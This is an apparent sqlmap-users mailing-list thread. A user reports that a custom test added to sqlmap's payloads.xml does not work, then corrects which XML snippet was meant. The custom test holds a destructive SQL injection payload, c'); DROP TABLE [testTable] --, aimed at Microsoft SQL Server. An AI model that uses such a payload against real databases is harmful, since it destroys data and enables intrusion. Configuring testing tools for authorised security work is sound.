<l.g> writes: > > hi! In payloads.xml I substituted this snippet: > > - <!-- End of AGAINST boolean full-text search boundaries > --> > - <!-- Boolean-based blind tests - WHERE/HAVING clause > --> > - <test> > - <test> > <title>drop table attack</title> > <stype>2</stype> > <level>1</level> > <risk>5</risk> > <clause>1</clause> > <where>1</where> > <vector>c'); DROP TABLE [testTable] --</vector> > - <request> > <payload>c'); DROP TABLE [testTable] --</payload> > <comment>--</comment> > </request> > - <response> > <grep>object</grep> > </response> > - <details> > <dbms>Microsoft SQL Server</dbms> > </details> > </test> > - <test> > <title>AND boolean-based blind - WHERE or HAVING clause</title> > <stype>1</stype> > <level>1</level> > <risk>1</risk> > <clause>1</clause> > <where>1</where> > <vector>AND [INFERENCE]</vector> > - <request> > <payload>AND [RANDNUM]=[RANDNUM]</payload> > </request> > - <response> > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> > </response> > </test> > > with this: > > - <!-- End of AGAINST boolean full-text search boundaries > --> > - <!-- Boolean-based blind tests - WHERE/HAVING clause > --> > - <test> > - <test> > <title>AND boolean-based blind - WHERE or HAVING clause</title> > <stype>1</stype> > <level>1</level> > <risk>1</risk> > <clause>1</clause> > <where>1</where> > <vector>AND [INFERENCE]</vector> > - <request> > <payload>AND [RANDNUM]=[RANDNUM]</payload> > </request> > - <response> > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> > </response> > </test> > > but it doesn't work.. > thank you > > -------------------------------------------------------------------------- ---- > CenturyLink Cloud: The Leader in Enterprise Cloud Services. > Learn Why More Businesses Are Choosing CenturyLink Cloud For > Critical Workloads, Development Environments & Everything In Between. > Get a Quote or Start a Free Trial Today. > http://pubads.g.doubleclick.net/gampad/clk? id=119420431&iu=/4140/ostg.clktrk > Sorry! I inverted the snippets in the previous post..
this is what I added to std xml: - <test> <title>drop table attack</title> <stype>2</stype> <level>1</level> <risk>5</risk> <clause>1</clause> <where>1</where> <vector>c'); DROP TABLE [testTable] --</vector> - <request> <payload>c'); DROP TABLE [testTable] --</payload> <comment>--</comment> </request> - <response> <grep>object</grep> </response> - <details> <dbms>Microsoft SQL Server</dbms> </details> </test> ------------------------------------------------------------------------------ CenturyLink Cloud: The Leader in Enterprise Cloud Services. Learn Why More Businesses Are Choosing CenturyLink Cloud For Critical Workloads, Development Environments & Everything In Between. Get a Quote or Start a Free Trial Today. http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
